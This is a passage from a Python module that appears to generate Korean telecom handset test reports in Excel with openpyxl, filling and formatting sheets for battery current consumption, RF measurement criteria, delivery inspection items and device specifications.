'N', 'O', 'P']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '7'].fill = self.apricot_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.brown_fill\n sheet_out[col + '12'].fill = self.apricot_fill\n sheet_out[col + '13'].fill = self.apricot_fill\n sheet_out[col + '18'].fill = self.brown_fill\n sheet_out[col + '19'].fill = self.brown_fill\n sheet_out[col + '20'].fill = self.apricot_fill\n sheet_out[col + '21'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n sheet_out[col + '40'].fill = self.brown_fill\n sheet_out[col + '41'].fill = self.brown_fill\n sheet_out[col + '42'].fill = self.apricot_fill\n sheet_out[col + '43'].fill = self.apricot_fill\n sheet_out[col + '48'].fill = self.brown_fill\n sheet_out[col + '49'].fill = self.brown_fill\n sheet_out[col + '50'].fill = self.apricot_fill\n sheet_out[col + '51'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n sheet_out[col + '24'].fill = self.brown_fill\n sheet_out[col + '25'].fill = self.brown_fill\n sheet_out[col + '26'].fill = self.apricot_fill\n 
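# Editor's note: the style passes in this section repeat the same nested loop for
# each rectangular range. openpyxl returns a tuple of row tuples when a worksheet
# is sliced with a range string such as "A4:P15", so the pattern can be wrapped
# once. `apply_style` is a hypothetical helper, not part of the original module.

def apply_style(ws, cell_range, border=None, font=None, alignment=None, fill=None):
    """Apply any provided style objects to every cell in ws[cell_range]."""
    for row in ws[cell_range]:
        for cell in row:
            if border is not None:
                cell.border = border
            if font is not None:
                cell.font = font
            if alignment is not None:
                cell.alignment = alignment
            if fill is not None:
                cell.fill = fill

# e.g. apply_style(sheet_out, "A4:P15", border=self.thin_border) would replace one
# of the border loops above.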
sheet_out[col + '27'].fill = self.apricot_fill\n sheet_out[col + '32'].fill = self.brown_fill\n sheet_out[col + '33'].fill = self.brown_fill\n sheet_out[col + '34'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.apricot_fill\n\n for i in [8, 9, 14, 15, 22, 23, 28, 29, 36, 37, 44, 45, 52, 53]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류(시간) Tab\n def time_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n\n # get data from wb_input\n sheet_in = wb_output['배터리소모전류 세부데이터']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류(시간)']\n target = sheet_in['A8'].value\n ref = sheet_in['A9'].value\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:H1')\n sheet_out['A1'] = '배터리소모전류 결과 (시간)'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G '\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = sheet_in['E4'].value\n sheet_out.merge_cells('D4:E4')\n sheet_out['D4'] = sheet_in['I4'].value\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = sheet_in['M4'].value\n\n sheet_out['B5'] = sheet_in['E5'].value\n sheet_out['C5'] = sheet_in['G5'].value\n sheet_out['D5'] = sheet_in['I5'].value\n sheet_out['E5'] = sheet_in['K5'].value\n sheet_out['F5'] = sheet_in['M5'].value\n sheet_out['G5'] = sheet_in['O5'].value\n sheet_out['H5'] = sheet_in['G11'].value\n\n # sheet row 6 handle\n sheet_out['A6'] = 'SKT 기준'\n sheet_out['B6'] = sheet_in['F6'].value\n sheet_out['C6'] = sheet_in['H6'].value\n sheet_out['D6'] = sheet_in['J6'].value\n sheet_out['E6'] = sheet_in['L6'].value\n sheet_out['F6'] = sheet_in['N6'].value\n sheet_out['G6'] = sheet_in['P6'].value\n sheet_out['H6'] = sheet_in['H12'].value\n\n # sheet row 7~8\n sheet_out['A7'] = target\n sheet_out['B7'] = sheet_in['F8'].value\n sheet_out['C7'] = sheet_in['H8'].value\n sheet_out['D7'] = sheet_in['J8'].value\n sheet_out['E7'] = sheet_in['L8'].value\n sheet_out['F7'] = sheet_in['N8'].value\n sheet_out['G7'] = sheet_in['P8'].value\n sheet_out['H7'] = sheet_in['H14'].value\n sheet_out['A8'] = ref\n sheet_out['B8'] = sheet_in['F9'].value\n sheet_out['C8'] = sheet_in['H9'].value\n sheet_out['D8'] = sheet_in['J9'].value\n sheet_out['E8'] = sheet_in['L9'].value\n sheet_out['F8'] = sheet_in['N9'].value\n sheet_out['G8'] = sheet_in['P9'].value\n sheet_out['H8'] = sheet_in['H15'].value\n\n # sheet row 9~10\n sheet_out.merge_cells('A9:A10')\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = sheet_in['I10'].value\n sheet_out['C9'] = sheet_in['K10'].value\n sheet_out['D9'] = sheet_in['M10'].value\n sheet_out['E9'] = '동영상'\n sheet_out['F9'] = sheet_in['E10'].value\n\n sheet_out['B10'] = sheet_in['I11'].value\n sheet_out['C10'] = sheet_in['K11'].value\n sheet_out['D10'] = sheet_in['M11'].value\n sheet_out['E10'] = '녹화'\n sheet_out['F10'] = sheet_in['E11'].value\n\n # sheet row 11 handle\n sheet_out['A11'] = 'SKT 기준'\n sheet_out['B11'] = sheet_in['J12'].value\n sheet_out['C11'] = 
sheet_in['L12'].value\n sheet_out['D11'] = sheet_in['N12'].value\n sheet_out['E11'] = sheet_in['P12'].value\n sheet_out['F11'] = sheet_in['F12'].value\n\n # sheet row 12~13\n sheet_out['A12'] = target\n sheet_out['B12'] = sheet_in['J14'].value\n sheet_out['C12'] = sheet_in['L14'].value\n sheet_out['D12'] = sheet_in['N14'].value\n sheet_out['E12'] = sheet_in['P14'].value\n sheet_out['F12'] = sheet_in['F14'].value\n sheet_out['A13'] = ref\n sheet_out['B13'] = sheet_in['F15'].value\n sheet_out['C13'] = sheet_in['H15'].value\n sheet_out['D13'] = sheet_in['J15'].value\n sheet_out['E13'] = sheet_in['L15'].value\n sheet_out['F13'] = sheet_in['N15'].value\n\n # sheet row 15~17 handle\n sheet_out['A15'] = '▣ LTE'\n sheet_out.merge_cells('A16:A17')\n sheet_out['A16'] = '구분'\n sheet_out.merge_cells('B16:C16')\n sheet_out['B16'] = sheet_in['E18'].value\n sheet_out.merge_cells('D16:E16')\n sheet_out['D16'] = sheet_in['I18'].value\n sheet_out.merge_cells('F16:H16')\n sheet_out['F16'] = sheet_in['M18'].value\n\n sheet_out['B17'] = sheet_in['E19'].value\n sheet_out['C17'] = sheet_in['G19'].value\n sheet_out['D17'] = sheet_in['I19'].value\n sheet_out['E17'] = sheet_in['K19'].value\n sheet_out['F17'] = sheet_in['M19'].value\n sheet_out['G17'] = sheet_in['O19'].value\n sheet_out['H17'] = sheet_in['E25'].value\n\n # sheet row 18 handle\n sheet_out['A18'] = 'SKT 기준'\n sheet_out['B18'] = sheet_in['F20'].value\n sheet_out['C18'] = sheet_in['H20'].value\n sheet_out['D18'] = sheet_in['J20'].value\n sheet_out['E18'] = sheet_in['L20'].value\n sheet_out['F18'] = sheet_in['N20'].value\n sheet_out['G18'] = sheet_in['P20'].value\n sheet_out['H18'] = sheet_in['F26'].value\n\n # sheet row 19~20\n sheet_out['A19'] = target\n sheet_out['B19'] = sheet_in['F22'].value\n sheet_out['C19'] = sheet_in['H22'].value\n sheet_out['D19'] = sheet_in['J22'].value\n sheet_out['E19'] = sheet_in['L22'].value\n sheet_out['F19'] = sheet_in['N22'].value\n sheet_out['G19'] = sheet_in['P22'].value\n sheet_out['H19'] = sheet_in['F28'].value\n sheet_out['A20'] = ref\n sheet_out['B20'] = sheet_in['F23'].value\n sheet_out['C20'] = sheet_in['H23'].value\n sheet_out['D20'] = sheet_in['J23'].value\n sheet_out['E20'] = sheet_in['L23'].value\n sheet_out['F20'] = sheet_in['N23'].value\n sheet_out['G20'] = sheet_in['P23'].value\n sheet_out['H20'] = sheet_in['F29'].value\n\n # sheet row 21~22\n sheet_out.merge_cells('A21:A22')\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = sheet_in['G24'].value\n sheet_out['C21'] = sheet_in['I24'].value\n sheet_out['D21'] = sheet_in['K24'].value\n\n sheet_out['B22'] = sheet_in['G25'].value\n sheet_out['C22'] = sheet_in['I25'].value\n sheet_out['D22'] = sheet_in['K25'].value\n\n # sheet row 23 handle\n sheet_out['A23'] = 'SKT 기준'\n sheet_out['B23'] = sheet_in['H26'].value\n sheet_out['C23'] = sheet_in['J26'].value\n sheet_out['D23'] = sheet_in['L26'].value\n\n # sheet row 24~25\n sheet_out['A24'] = target\n sheet_out['B24'] = sheet_in['H28'].value\n sheet_out['C24'] = sheet_in['J28'].value\n sheet_out['D24'] = sheet_in['L28'].value\n sheet_out['A25'] = ref\n sheet_out['B25'] = sheet_in['H29'].value\n sheet_out['C25'] = sheet_in['J29'].value\n sheet_out['D25'] = sheet_in['L29'].value\n\n # sheet row 27~29 handle\n sheet_out['A27'] = '▣ WCDMA'\n sheet_out.merge_cells('A28:A29')\n sheet_out['A28'] = '구분'\n sheet_out['B28'] = sheet_in['E32'].value\n sheet_out.merge_cells('C28:D28')\n sheet_out['C28'] = sheet_in['G32'].value\n sheet_out['E28'] = sheet_in['K32'].value\n\n sheet_out['B29'] = sheet_in['E33'].value\n 
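# Editor's note: this method copies dozens of individually named cells from the
# detail sheet into the summary sheet. A mapping table keeps such source ->
# destination pairs auditable in one place; the sketch below is illustrative only
# (the example pairs are taken from the nearby row 12 assignments).

def copy_cells(sheet_in, sheet_out, cell_map):
    """Copy sheet_in[src].value into sheet_out[dst] for every dst -> src pair."""
    for dst, src in cell_map.items():
        sheet_out[dst] = sheet_in[src].value

# row_12_map = {'B12': 'J14', 'C12': 'L14', 'D12': 'N14', 'E12': 'P14', 'F12': 'F14'}
# copy_cells(sheet_in, sheet_out, row_12_map)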
sheet_out['C29'] = sheet_in['G33'].value\n sheet_out['D29'] = sheet_in['I33'].value\n sheet_out['E29'] = sheet_in['K33'].value\n\n # sheet row 30 handle\n sheet_out['A30'] = 'SKT 기준'\n sheet_out['B30'] = sheet_in['F34'].value\n sheet_out['C30'] = sheet_in['H34'].value\n sheet_out['D30'] = sheet_in['J34'].value\n sheet_out['E30'] = sheet_in['L34'].value\n\n # sheet row 31~32\n sheet_out['A31'] = target\n sheet_out['B31'] = sheet_in['F36'].value\n sheet_out['C31'] = sheet_in['H36'].value\n sheet_out['D31'] = sheet_in['J36'].value\n sheet_out['E31'] = sheet_in['L36'].value\n sheet_out['A32'] = ref\n sheet_out['B32'] = sheet_in['F37'].value\n sheet_out['C32'] = sheet_in['H37'].value\n sheet_out['D32'] = sheet_in['J37'].value\n sheet_out['E32'] = sheet_in['L37'].value\n\n\n # sheet row 34~36 handle\n sheet_out['A34'] = '▣ WiFi'\n sheet_out.merge_cells('A35:A36')\n sheet_out['A35'] = '구분'\n sheet_out.merge_cells('B35:C35')\n sheet_out['B35'] = sheet_in['E40'].value\n sheet_out['D35'] = sheet_in['I40'].value\n sheet_out['E35'] = sheet_in['K40'].value\n sheet_out['F35'] = sheet_in['M40'].value\n\n sheet_out['B36'] = sheet_in['E41'].value\n sheet_out['C36'] = sheet_in['G41'].value\n sheet_out['D36'] = sheet_in['I41'].value\n sheet_out['E36'] = sheet_in['K41'].value\n sheet_out['F36'] = sheet_in['M41'].value\n\n # sheet row 37 handle\n sheet_out['A37'] = 'SKT 기준'\n sheet_out['B37'] = sheet_in['F42'].value\n sheet_out['C37'] = sheet_in['H42'].value\n sheet_out['D37'] = sheet_in['J42'].value\n sheet_out['E37'] = sheet_in['L42'].value\n sheet_out['F37'] = sheet_in['N42'].value\n\n # sheet row 38~39\n sheet_out['A38'] = target\n sheet_out['B38'] = sheet_in['F44'].value\n sheet_out['C38'] = sheet_in['H44'].value\n sheet_out['D38'] = sheet_in['J44'].value\n sheet_out['E38'] = sheet_in['L44'].value\n sheet_out['F38'] = sheet_in['N44'].value\n sheet_out['A39'] = ref\n sheet_out['B39'] = sheet_in['F45'].value\n sheet_out['C39'] = sheet_in['H45'].value\n sheet_out['D39'] = sheet_in['J45'].value\n sheet_out['E39'] = sheet_in['L45'].value\n sheet_out['F39'] = sheet_in['N45'].value\n\n # sheet row 41~43 handle\n sheet_out['A41'] = '▣ Bluetooth'\n sheet_out.merge_cells('A42:A43')\n sheet_out['A42'] = '구분'\n sheet_out.merge_cells('B42:F42')\n sheet_out['B42'] = sheet_in['E48'].value\n\n sheet_out['B43'] = sheet_in['E49'].value\n sheet_out['C43'] = sheet_in['G49'].value\n sheet_out['D43'] = sheet_in['I49'].value\n sheet_out['E43'] = sheet_in['K49'].value\n sheet_out['F43'] = sheet_in['M49'].value\n\n # sheet row 44 handle\n sheet_out['A44'] = 'SKT 기준'\n sheet_out['B44'] = sheet_in['F50'].value\n sheet_out['C44'] = sheet_in['H50'].value\n sheet_out['D44'] = sheet_in['J50'].value\n sheet_out['E44'] = sheet_in['L50'].value\n sheet_out['F44'] = sheet_in['N50'].value\n\n # sheet row 45~46\n sheet_out['A45'] = target\n sheet_out['B45'] = sheet_in['F52'].value\n sheet_out['C45'] = sheet_in['H52'].value\n sheet_out['D45'] = sheet_in['J52'].value\n sheet_out['E45'] = sheet_in['L52'].value\n sheet_out['F45'] = sheet_in['N52'].value\n sheet_out['A46'] = ref\n sheet_out['B46'] = sheet_in['F53'].value\n sheet_out['C46'] = sheet_in['H53'].value\n sheet_out['D46'] = sheet_in['J53'].value\n sheet_out['E46'] = sheet_in['L53'].value\n sheet_out['F46'] = sheet_in['N53'].value\n\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:H46\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top 
alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A27'].alignment = self.top_alignment\n sheet_out['A34'].alignment = self.top_alignment\n sheet_out['A41'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:H8\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A9:F13\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A16:H20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A21:D25\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A28:E32\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A35:F39\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A42:F46\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:H46\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [29.88, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '16'].fill = self.brown_fill\n sheet_out[col + '17'].fill = self.brown_fill\n sheet_out[col + '18'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F']:\n\n sheet_out[col + '9'].fill = self.brown_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.brown_fill\n sheet_out[col + '36'].fill = self.brown_fill\n sheet_out[col + '37'].fill = self.apricot_fill\n sheet_out[col + '42'].fill = self.brown_fill\n sheet_out[col + '43'].fill = self.brown_fill\n sheet_out[col + '44'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E']:\n\n sheet_out[col + '28'].fill = self.brown_fill\n sheet_out[col + '29'].fill = self.brown_fill\n sheet_out[col + '30'].fill = self.apricot_fill\n\n\n for col in ['A', 'B', 'C', 'D']:\n\n sheet_out[col + '21'].fill = self.brown_fill\n sheet_out[col + '22'].fill = self.brown_fill\n sheet_out[col + '23'].fill = self.apricot_fill\n\n for i in [7, 8, 12, 13, 19, 20, 24, 25, 31, 32, 38, 39, 45, 46]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 1 측정기준 Tab\n def attach_generate_data_1(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부1. 
측정기준 및 가점']\n list_band = ['Band 1 15M', 'Band 3 20M', 'Band 5 10M',\n 'Band 7 20M', 'Band 7 10M']\n list_trp_base = ['14.00dBm', '15.00dBm', '13.50dBm',\n '13.00dBm', '13.00dBm']\n list_tis_base = ['-92.00dBm', '-91.00dBm', '-87.00dBm',\n '-90.00dBm', '-93.00dBm']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부1. 측정기준 및 가점'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ RF 성능 : 기 출시 단말 측정하여 상위 70% 수준으로 설정'\n sheet_out['A4'] = ' -TRP'\n\n # 5~10 row\n sheet_out['A5'] = 'SISO LTE'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out.merge_cells('C5:D5')\n sheet_out['C5'] = '측정기준 History'\n\n for i in range(6, 11):\n sheet_out['A' + str(i)] = list_band[i - 6]\n sheet_out['B' + str(i)] = list_trp_base[i - 6]\n sheet_out.merge_cells('C6:D10')\n sheet_out['C6'] = '기준대비 1dB 증가후 +1점/1dBm 가점\\n기준대비 1dB 저하후 - 1점/1dBm 감점'\n # 11~17 row\n sheet_out['A11'] = ' -TIS (SISO LTE)'\n\n # 12~17 row\n sheet_out['A12'] = 'SISO LTE'\n sheet_out['B12'] = '기준(RHP)'\n sheet_out.merge_cells('C12:D12')\n sheet_out['C12'] = '측정기준 History'\n\n for i in range(13, 18):\n sheet_out['A' + str(i)] = list_band[i - 13]\n sheet_out['B' + str(i)] = list_trp_base[i - 13]\n sheet_out.merge_cells('C13:D17')\n sheet_out['C13'] = '기준대비 1dB 증가후 +1점/3dBm 가점\\n기준대비 1dB 저하후 - 1점/3dBm 감점'\n\n # 19~25 row\n sheet_out['A19'] = '▣ 배터리 소모전류'\n sheet_out.merge_cells('A20:D20')\n sheet_out['A20'] = \" - '18.1 ~ '19.8 납품검사 삼성/LG 단말 29종으로\\n측정 기준으로 소모전류 (평균+STD), 배터리 용량 (3000mA) 산출\"\n sheet_out.merge_cells('A21:D21')\n sheet_out['A21'] = \" - Ref. 단말 대비 10% 이내 (측정기준부재항목)\"\n\n sheet_out['A23'] = '▣ MOS'\n sheet_out.merge_cells('A24:D24')\n sheet_out['A24'] = \" - ITU-T 권고 P.800 항목에 규정 참고 (LTE : 3.5, WCDMA : 3.0)\"\n sheet_out.merge_cells('A25:D25')\n sheet_out['A25'] = '. MOS 3.5~4 : 자연스러운 통화 수준\\n. 
MOS 3~3.5 : 대화는 잘 이루어지지만 품질저하 느낄 수 있음'\n\n self.setPrintText('/s {}번 파일 \"첨부1\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D25\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['C6'].alignment = self.top_alignment_3\n sheet_out['A11'].alignment = self.top_alignment\n sheet_out['C13'].alignment = self.top_alignment_3\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment_3\n sheet_out['A21'].alignment = self.top_alignment\n sheet_out['A23'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D10\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A12:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D25\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n sheet_out.row_dimensions[20].height = 45\n sheet_out.row_dimensions[25].height = 45\n\n # Set Pattern Fill\n for i in [5, 12]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 7, 8, 9, 10, 13, 14, 15, 16, 17]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부1\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 2 측정기준 Tab\n def attach_generate_data_2(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부2. 납품검사']\n list_items = ['고온 고습/저온 Cycling 시험\t', '낙하시험', '방수시험', 'ESD (정전기) 시험',\n '개통 및 사용성 시험', 'RF Auto (50대, 제조사 자체 측정)', 'CATS_Priority1 (제조사 자체 측정)',\n 'GPS (제조사 자체 측정)', '발열 (제조사 자체 측정)', '카메라 전.후면 화질평가 (제조사 자체 측정)',\n 'WiFi 무선성능(제조사 자체 측정)', 'BT 무선성능(제조사 자체 측정)']\n list_items_2 = ['무선기기 형식등록', 'GCF 인증서', 'WiFi 인증서', 'NFC 인증서', 'Bluetooth 인증서']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부2. 
납품검사'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ 장소 : (빈곳)'\n\n # 4~16 row\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = 'Item'\n sheet_out['D4'] = '결과'\n\n sheet_out.merge_cells('A5:A8')\n sheet_out['A5'] = '신뢰성 시험'\n sheet_out.merge_cells('A9:A16')\n sheet_out['A9'] = 'Performance'\n\n for i in range(5, 17):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items[i - 5]\n\n # 18~24 row\n sheet_out['A18'] = '▣ 시험 인증서 (PLM 등록)'\n sheet_out['A19'] = '구분'\n sheet_out.merge_cells('B19:C19')\n sheet_out['B19'] = 'Item'\n sheet_out['D19'] = '결과'\n\n sheet_out.merge_cells('A20:A24')\n sheet_out['A20'] = '인증서'\n\n for i in range(20, 25):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items_2[i - 20]\n\n\n self.setPrintText('/s {}번 파일 \"첨부2\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A18'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D16\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A19:D24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D24\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 23.75, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 19]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in range(5,17):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n for i in range(20,25):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부2\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 3 측정기준 Tab\n def attach_generate_data_3(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부3. 단말 상세 SPEC']\n list_items = ['모뎀', 'RFIC', 'Display', '크기', '배터리 용량', 'Flash ROM', 'SRAM', '카메라', '사운드', 'MIC', '방수/방진', '페이', '생체인식',\n '충전', '기타', 'LTE 주파수', 'LTE 로밍 지원 주파수', 'WCDMA 주파수', 'OS(출시버전)', '출시']\n list_items_2 = ['5G NW options', '5G Frequency', 'UE-Category', 'Max Throughput', 'ENDC capability',\n 'LTE capability', 'Modulation', 'MIMO', 'CSI-RS', 'Power', 'Waveform']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '첨부3. 
단말 상세 SPEC'\n\n # sheet row 2 handle\n sheet_out['A2'] = '▣ 기본 정보 '\n\n # 3~23 row\n sheet_out['A3'] = '구분'\n sheet_out['B3'] = '모델1'\n sheet_out['C3'] = 'Ref. 모델'\n\n for i in range(4, 24):\n sheet_out['A' + str(i)] = list_items[i - 4]\n\n # 25~37 row\n sheet_out['A25'] = '▣ N/W Feature 비교'\n sheet_out['A26'] = '구분'\n sheet_out['B26'] = '모델1'\n sheet_out['C26'] = 'Ref. 모델'\n\n for i in range(27, 38):\n sheet_out['A' + str(i)] = list_items_2[i - 27]\n\n self.setPrintText('/s {}번 파일 \"첨부3\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:C37\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A3:C23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A26:C37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:C3\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A4:C23\"]:\n for cell in mCell:\n cell.font = self.value_font\n for mCell in sheet_out[\"A25:C26\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A27:C37\"]:\n for cell in mCell:\n cell.font = self.value_font\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n 